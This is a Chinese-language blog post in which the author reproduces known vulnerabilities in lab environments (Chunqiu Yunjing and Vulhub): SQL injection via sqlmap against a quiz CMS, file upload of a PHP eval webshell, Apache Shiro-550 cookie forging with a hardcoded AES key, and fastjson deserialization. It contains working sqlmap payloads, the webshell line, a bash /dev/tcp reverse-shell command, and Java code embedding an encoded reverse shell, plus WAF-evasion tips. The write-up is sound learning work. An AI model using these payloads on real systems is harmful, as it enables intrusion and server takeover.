<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="false" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  

  
  <title>漏洞复现学习（春秋云镜+vulhub） | crumbling&#39;s secret room</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <link rel="preload" href="/css/fonts/Roboto-Regular.ttf" as="font" type="font/ttf" crossorigin="anonymous">
  <link rel="preload" href="/css/fonts/Roboto-Bold.ttf" as="font" type="font/ttf" crossorigin="anonymous">
  <link rel="preload" href="/css/fonts/MaterialSymbolsRounded.woff2" as="font" type="font/woff2" crossorigin="anonymous">

  <meta name="description" content="近期没有什么比赛，比较空，所以来复现&#x2F;学习一点漏洞，主要是参考Vulhub+春秋云境.com (ichunqiu.com) 春秋云镜  CVE-2022-32991 CVE-2022-30887 CVE-2022-28512  Vulhub  shiro550 log4j2 fastjson反序列化漏洞  春秋云镜CVE-2022-32991描述：该CMS的welcome.php中存在SQL注入攻">
<meta property="og:type" content="article">
<meta property="og:title" content="漏洞复现学习（春秋云镜+vulhub）">
<meta property="og:url" content="http://example.com/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="crumbling&#39;s secret room">
<meta property="og:description" content="近期没有什么比赛，比较空，所以来复现&#x2F;学习一点漏洞，主要是参考Vulhub+春秋云境.com (ichunqiu.com) 春秋云镜  CVE-2022-32991 CVE-2022-30887 CVE-2022-28512  Vulhub  shiro550 log4j2 fastjson反序列化漏洞  春秋云镜CVE-2022-32991描述：该CMS的welcome.php中存在SQL注入攻">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240619135608001.png">
<meta property="og:image" content="http://example.com/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240619141656660.png">
<meta property="og:image" content="http://example.com/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240615135909485.png">
<meta property="article:published_time" content="2024-06-15T02:33:02.154Z">
<meta property="article:modified_time" content="2024-06-19T06:45:05.360Z">
<meta property="article:author" content="crumbling">
<meta property="article:tag" content="复现">
<meta property="article:tag" content="漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240619135608001.png">
  
    <link rel="alternate" href="/atom.xml" title="crumbling's secret room" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>crumbling's secret room </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS 订阅">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="搜索" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS 订阅">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">crumbling </div>
      <div class="dot"></div>
      <div class="subtitle">This is the subtitle </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://steamcommunity.com/profiles/76561199334949091/" title="Steam"><i class="fa-brands fa-steam"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/fcrumbling" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      



    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">标签</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Crypto/" rel="tag">Crypto</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Web/" rel="tag">Web</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/gb%E5%9F%BA/" rel="tag">gb基</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/hnp/" rel="tag">hnp</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E5%A4%8D%E7%8E%B0/" rel="tag">复现</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%A0%BC%E5%AF%86%E7%A0%81/" rel="tag">格密码</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%B7%B1%E5%BA%A6%E6%90%9C%E7%B4%A2/" rel="tag">深度搜索</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E/" rel="tag">漏洞</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E7%9B%B8%E5%85%B3%E6%98%8E%E6%96%87%E6%94%BB%E5%87%BB/" rel="tag">相关明文攻击</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E8%83%8C%E5%8C%85%E9%97%AE%E9%A2%98/" rel="tag">背包问题</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E8%87%AA%E6%88%91%E4%BB%8B%E7%BB%8D/" rel="tag">自我介绍</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%9B%85%E5%85%8B%E6%AF%94%E7%AC%A6%E5%8F%B7/" rel="tag">雅克比符号</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%AB%98%E6%96%AF%E5%90%AF%E5%8F%91%E5%BC%8F/" rel="tag">高斯启发式</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">归档</h3>
      
      
        <a class="archive-link" href="/archives/2024/06 ">
          六月 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/05 ">
          五月 2024 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/12 ">
          十二月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          十一月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          十月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          九月 2023 
          <div class="archive-count">5 </div>
        </a>
      
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">最新文章</h3>
      <ul>
        
          <a class="recent-link" href="/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title="漏洞复现学习（春秋云镜+vulhub）" >
            <div class="recent-link-text">
              漏洞复现学习（春秋云镜+vulhub）
            </div>
          </a>
        
          <a class="recent-link" href="/2024/05/29/Java%E5%AE%89%E5%85%A8/" title="Java安全" >
            <div class="recent-link-text">
              Java安全
            </div>
          </a>
        
          <a class="recent-link" href="/2024/05/27/Portswigger%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/" title="PortSwigger靶场记录" >
            <div class="recent-link-text">
              PortSwigger靶场记录
            </div>
          </a>
        
          <a class="recent-link" href="/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="Web安全学习笔记" >
            <div class="recent-link-text">
              Web安全学习笔记
            </div>
          </a>
        
          <a class="recent-link" href="/2023/12/20/%E5%BC%BA%E7%BD%91%E6%9D%AF2023-crypto-%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/" title="强网杯2023-crypto-部分复现" >
            <div class="recent-link-text">
              强网杯2023-crypto-部分复现
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-漏洞复现" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        漏洞复现学习（春秋云镜+vulhub）
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2024-06-15T02:33:02.154Z" itemprop="datePublished">2024-06-15</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    未分类 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            2.2k 词 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%A4%8D%E7%8E%B0/" rel="tag">复现</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E/" rel="tag">漏洞</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <p>近期没有什么比赛，比较空，所以来复现/学习一点漏洞，主要是参考<a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub">Vulhub</a>+<a target="_blank" rel="noopener" href="https://yunjing.ichunqiu.com/">春秋云境.com (ichunqiu.com)</a></p>
<p><a href="#1">春秋云镜</a></p>
<ul>
<li><a href="#CVE-2022-32991">CVE-2022-32991</a></li>
<li><a href="#CVE-2022-30887">CVE-2022-30887</a></li>
<li><a href="#CVE-2022-28512">CVE-2022-28512</a></li>
</ul>
<p><a href="#2">Vulhub</a></p>
<ul>
<li><a href="#shiro550">shiro550</a></li>
<li><a href="#log4j2">log4j2</a></li>
<li><a href="#fastjson">fastjson反序列化漏洞</a></li>
</ul>
<h1 id="春秋云镜"><a href="#春秋云镜" class="headerlink" title="春秋云镜"></a><h1 id="1">春秋云镜</h1></h1><h2 id="CVE-2022-32991"><a href="#CVE-2022-32991" class="headerlink" title="CVE-2022-32991"></a><h2 id="CVE-2022-32991">CVE-2022-32991</h2></h2><p>描述：该CMS的welcome.php中存在SQL注入攻击。</p>
<p>根据描述，随意注册登录个账号，即可进入到<code>/welcome.php?q=1</code>，这边没啥东西，sqlmap扫了一遍也没有发现问题。</p>
<p>搜一下CVE，可以找到<a target="_blank" rel="noopener" href="https://github.com/advisories/GHSA-chmr-hq3h-fw8j">基于网络的测验系统 v1.0 被发现包含…·CVE-2022-32991 ·GitHub 咨询数据库</a>，说是eid参数，找了一下，start点进去可以跳转过去，这里就用到了eid参数</p>
<p>拿sqlmap<code>--batch</code>嗯扫一波</p>
<p>结果也是能看到eid处有漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sqlmap identified the following injection point(s) with a total of 1104 HTTP(s) requests:</span><br><span class="line">Parameter: eid (GET)</span><br><span class="line">    Type: error-based</span><br><span class="line">    Title: MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</span><br><span class="line">    Payload: q=quiz&amp;step=2&amp;eid=60377db362694&#x27;||(SELECT 0x79435444 FROM DUAL WHERE 1996=1996 AND (SELECT 6145 FROM(SELECT COUNT(*),CONCAT(0x7170707871,(SELECT (ELT(6145=6145,1))),0x716b7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||&#x27;&amp;n=1&amp;t=34</span><br><span class="line"></span><br><span class="line">    Type: time-based blind</span><br><span class="line">    Title: MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK)</span><br><span class="line">    Payload: q=quiz&amp;step=2&amp;eid=60377db362694&#x27;||(SELECT 0x6c754864 FROM DUAL WHERE 8125=8125 AND 9043=BENCHMARK(5000000,MD5(0x6b556a57)))||&#x27;&amp;n=1&amp;t=34</span><br></pre></td></tr></table></figure>
<p><code>--dbs --batch</code>继续</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">available databases [4]:</span><br><span class="line">[*] ctf</span><br><span class="line">[*] information_schema</span><br><span class="line">[*] mysql</span><br><span class="line">[*] performance_schema</span><br></pre></td></tr></table></figure>
<p><code>--batch -D &#39;ctf&#39; --tables</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">| admin     |</span><br><span class="line">| history   |</span><br><span class="line">| options   |</span><br><span class="line">| rank      |</span><br><span class="line">| user      |</span><br><span class="line">| answer    |</span><br><span class="line">| flag      |</span><br><span class="line">| questions |</span><br><span class="line">| quiz      |</span><br></pre></td></tr></table></figure>
<p><code>--batch -D &#39;ctf&#39; -T &#39;flag&#39; --columns</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">+--------+---------------+</span><br><span class="line">| Column | Type          |</span><br><span class="line">+--------+---------------+</span><br><span class="line">| flag   | varchar(1024) |</span><br><span class="line">+--------+---------------+</span><br></pre></td></tr></table></figure>
<p><code>--batch -D &#39;ctf&#39; -T &#39;flag&#39; -C &#39;flag&#39; --dump</code></p>
<p>然后就能吐出flag了</p>
<p>额外的一点sqlmap技巧</p>
<p>wp看到的，实际上来看这个环境其实不需要，但我觉得这两个需求都很合理</p>
<p>登录访问，使用–cookie参数使得sqlmap绕过身份验证</p>
<p>–user-agent参数/–random-agent使sqlmap绕过客户端验证，否则可能会被识别到sqlmap。</p>
<h2 id="CVE-2022-30887"><a href="#CVE-2022-30887" class="headerlink" title="CVE-2022-30887"></a><h2 id="CVE-2022-30887">CVE-2022-30887</h2></h2><p>描述：多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。</p>
<p>没账号，抓个登录的包也没看到什么东西。</p>
<p>考验一手信息收集，只知道账号是个邮箱，是在环境里瞎点找到的，不知道有没有什么更有思路的方法。</p>
<p><code>mayuri.infospace@gmail.com</code></p>
<p>密码应该不含数字（手测含数字会提示格式错误）</p>
<p>没有更多的信息，长度未知弱密码也爆不出来，这边彻底卡住了，去看了一圈思路，基本上还是靠猜，密码是<code>mayurik</code></p>
<p>登陆之后就是一个常见的管理系统，找一下有文件上传的位置（添加药品这里）。</p>
<p>题目有说是php所以写个php的一句话木马<code>&lt;?php @eval($_POST[&#39;cmd&#39;]); ?&gt;</code></p>
<p><img src="/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240619135608001.png" alt="image-20240619135608001"></p>
<p>另外环境没什么过滤，所以没啥必要抓包重放。</p>
<p>后面直接antsword（测试的时候不知道哪里弄坏了环境一直连接不上，手动执行命令也没成功，重启环境后就正常了）</p>
<p><img src="/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240619141656660.png" alt="image-20240619141656660"></p>
<p>flag在根目录里。</p>
<h2 id="CVE-2022-28512"><a href="#CVE-2022-28512" class="headerlink" title="CVE-2022-28512"></a><h2 id="CVE-2022-28512">CVE-2022-28512</h2></h2><p>描述：Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客，它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能，您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下，id参数存在一个SQL注入漏洞。</p>
<h1 id="Vulhub"><a href="#Vulhub" class="headerlink" title="Vulhub"></a><h1 id="2">Vulhub</h1></h1><h2 id="Shiro-550-lt-h1-gt"><a href="#Shiro-550-lt-h1-gt" class="headerlink" title="Shiro 550&lt;/h1&gt;"></a><h2 id="shiro550">Shiro 550&lt;/h1&gt;</h2><p>shiro反序列化漏洞，CVE-2016-4437</p>
<p><code>response</code>中若有<code>rememberMe=deleteMe</code>，则表示使用了shiro框架</p>
<p>而bp的插件BurpShiroPassiveScan可以进行检测并报出漏洞</p>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>shiro框架提供了一个记住密码功能，会在cookie中添加一段包含了用户身份信息的加密数据，该加密流程为序列化+AES+base64,验证方式则为base64+AES+反序列化。</p>
<p>base64和漏洞序列化其实不具备严格意义上的加密效果，加密效果主要体现在AES上，而AES安全的核心在于其密钥key不被泄露，但是shiro&lt;=1.2.4版本中的AES都是用了固定的<strong>kPH+bIxk5D2deZiIxcaaaA==</strong>作为密钥，这就导致攻击者可以自己完成cookie的生成并在其中夹杂恶意代码。</p>
<h2 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h2><p>shiro_exploit.py可以自动检测shiro框架并对密钥进行爆破，这里已经获得了key，暂时不需要。</p>
<p>并且有shiro_attack-2.2.jar这种综合的图形化工具可以完成后续的漏洞利用，这里暂不采取此方式。</p>
<p>搭建环境后用给的账号密码登录抓包看一下，能看到<code>Cookie</code>添加了一串东西(如果错误账号密码就只有第一个<code>Cookie</code>)</p>
<p><img src="/2024/06/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240615135909485.png" alt="image-20240615135909485"></p>
<p>根据前面的原理，开始构造cookie获取反弹shell（可以理解为与ssh等连接方式相反，由受攻击方主动连接攻击方的服务端程序）</p>
<p><strong>反弹shell</strong>，获取反弹shell的大致流程为：</p>
<p>攻击端开启监听，比如说<code>nc -l 2333</code>，然后在被攻击端执行<code>bash -i &gt;&amp; /dev/tcp/攻击ip/2333 0&gt;&amp;1</code>（通过2次重定向，将被攻击的给攻击端，再将攻击端的命令给的被攻击端），那么攻击端就会获得被攻击的shell了。</p>
<p>前面提到该漏洞可以让cookie夹带恶意代码，这里要做的就是夹带这串要被攻击端执行的命令。</p>
<p>生成rememberMe</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.crumbling;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.shiro.codec.Base64;</span><br><span class="line"><span class="keyword">import</span> org.apache.shiro.codec.CodecSupport;</span><br><span class="line"><span class="keyword">import</span> org.apache.shiro.crypto.AesCipherService;</span><br><span class="line"><span class="keyword">import</span> org.apache.shiro.util.ByteSource;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestRemember</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">byte</span>[] payloads = <span class="string">&quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjE4OS84ODg4IDA+JjE=&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span>.getBytes();</span><br><span class="line"></span><br><span class="line">        <span class="type">AesCipherService</span> <span class="variable">aes</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">AesCipherService</span>();</span><br><span class="line">        <span class="type">byte</span>[] key = Base64.decode(CodecSupport.toBytes(<span class="string">&quot;kPH+bIxk5D2deZiIxcaaaA==&quot;</span>));</span><br><span class="line"></span><br><span class="line">        <span class="type">ByteSource</span> <span class="variable">ciphertext</span> <span class="operator">=</span> aes.encrypt(payloads, key);</span><br><span class="line">        System.out.printf(ciphertext.toString());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>将结果写入Cookie重放应该就能在监听的终端看到被攻击的shell然后进行各种命令行操作了，不过同一台虚拟机作为攻击和被攻击似乎不太好监听，重新摸索一下可能要。不过大致内容就是以上了。</p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p>现实的漏洞挖掘场景，可能在key上出现问题，大致思路是字典爆破，不过更合适的应该是一些自动化的测试工具，应该要比自己人工爆破要快捷。</p>
<p>以及用于重定向的’&gt;’’&lt;’可能被各种waf啊hids这样的设备检测，可以尝试利用<a target="_blank" rel="noopener" href="https://ares-x.com/tools/runtime-exec">Runtime.exec Payload Generater | AresX’s Blog (ares-x.com)</a>编码绕过一下</p>
<h2 id="log4j2-lt-h1-gt"><a href="#log4j2-lt-h1-gt" class="headerlink" title="log4j2&lt;/h1&gt;"></a><h2 id="log4j2">log4j2&lt;/h1&gt;</h2><p>CVE-2021-44228</p>
<p>log4j2是apache下的java应用常见开源日志库.JNDI，全称为Java命名和目录接口（Java Naming and Directory Interface）允许从指定的远程服务器获取并加载对象。相当于一个用于映射的字典，使得Java应用程序可以和这些命名服务和目录服务之间进行交互。</p>
<p>影响版本2.0 &lt;=log4j2 &lt;= 2.14.1</p>
<h2 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h2><p>Log4j2提供的lookup功能下的 jndi Lookup模块的漏洞，该功能模块在输出日志信息时允许、通过相应的协议去请求远程主机上的资源。简单来说就是JNDI可以使用相应目录接口请求数据，并且可以远程下载一个恶意的class文件,然后加载该class文件并构建对象，最后导致攻击。</p>
<p>（大致就是这个意思，看了一圈感觉没有找到特别满意的）</p>
<h2 id="漏洞环境"><a href="#漏洞环境" class="headerlink" title="漏洞环境"></a>漏洞环境</h2><p>log4j2是个库啊，所以复现的基础可以直接在调用了库的web应用上实现。</p>
<h2 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h2><h2 id="fastjson反序列化漏洞-lt-h1-gt"><a href="#fastjson反序列化漏洞-lt-h1-gt" class="headerlink" title="fastjson反序列化漏洞&lt;/h1&gt;"></a><h2 id="fastjson">fastjson反序列化漏洞&lt;/h1&gt;</h2><p>fastjson是阿里开发的开源json解析库，主要作用是json字符串反序列化到JavaBean</p>
<p>漏洞影响＜=1.2.48fastjson</p>
<p>复现环境为1.2.27</p>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p>主要是<code>AutoType</code>导致的，而复现环境1.2.27版本在1.2.24后，<code>AutoType</code>已经被禁用，所以需要单独开启。</p>
<p><code>@type</code>是<code>fastjson</code>中一个特殊注解，用于表示<code>json</code>字符串中某个属性是一个java对象的类型</p>
<p>一段@type的使用案例</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Main</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">json</span> <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;java.lang.Runtime\&quot;&#125;&quot;</span>;</span><br><span class="line">        ParserConfig.getGlobalInstance().addAccept(<span class="string">&quot;java.lang&quot;</span>);</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">runtime</span> <span class="operator">=</span> (Runtime) JSON.parseObject(json, Object.class);</span><br><span class="line">        runtime.exec(<span class="string">&quot;calc.exe&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xiaozi/p/13239046.html">Shiro反序列化漏洞利用汇总（Shiro-550+Shiro-721） - Bypass - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/380568.html">log4j2原理分析及漏洞复现- CVE-2021-44228 - FreeBuf网络安全行业门户</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/381092.html">java经典漏洞复现（基于vulhub） - FreeBuf网络安全行业门户</a></p>
</h2></h2></h2>
        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left  disabled "
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2024/05/29/Java%E5%AE%89%E5%85%A8/"
      title="Java安全"
     >

    <p class="title-text">
      
        Java安全
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2024 crumbling<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn hide" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.classList.remove('hide')
        } else {
            btn.classList.add('hide')
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
